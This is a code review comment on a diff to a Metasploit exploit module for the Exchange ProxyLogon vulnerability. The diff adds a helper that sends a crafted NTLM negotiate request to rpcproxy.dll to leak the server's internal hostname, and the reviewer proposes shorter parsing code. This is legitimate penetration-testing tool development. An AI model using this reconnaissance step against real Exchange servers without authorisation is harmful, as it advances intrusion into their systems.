modules/exploits/windows/http/exchange_proxylogon_rce.rb

```diff
@@ -247,6 +258,36 @@ def request_autodiscover(server_name)
     [server, legacy_dn]
   end
 
+  def request_fqdn
+    ntlm_ssp = "NTLMSSP\x00\x01\x00\x00\x00\x05\x02\x88\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    received = send_request_raw(
+      'method' => 'RPC_IN_DATA',
+      'uri' => normalize_uri('rpc', 'rpcproxy.dll'),
+      'headers' => {
+        'Authorization' => "NTLM #{Rex::Text.encode_base64(ntlm_ssp)}"
+      }
+    )
+    fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received
+
+    if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)
+      hash = received['WWW-Authenticate'].split('NTLM ')[1]
+      message = Rex::Proto::NTLM::Message.parse(Rex::Text.decode_base64(hash))[:target_info].value
+
+      # Retrieve Domain name subblock info
+      nb_domain = parse_ntlm_info(message, "\x02\x00", 0)
+      # Retrieve Server name subblock info
+      nb_name = parse_ntlm_info(message, "\x01\x00", nb_domain[:new_offset])
+      # Retrieve DNS domain name subblock info
+      dns_domain = parse_ntlm_info(message, "\x04\x00", nb_name[:new_offset])
+      # Retrieve DNS server name subblock info
+      dns_server = parse_ntlm_info(message, "\x03\x00", dns_domain[:new_offset])
+
+      return dns_server[:message].downcase
```

Comment:
By using `Net::NTLM` which we already have as a dependency, we can reduce all of this code and remove the `parse_ntlm_info` function.

```suggestion
      message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))
      dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]
      return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase
```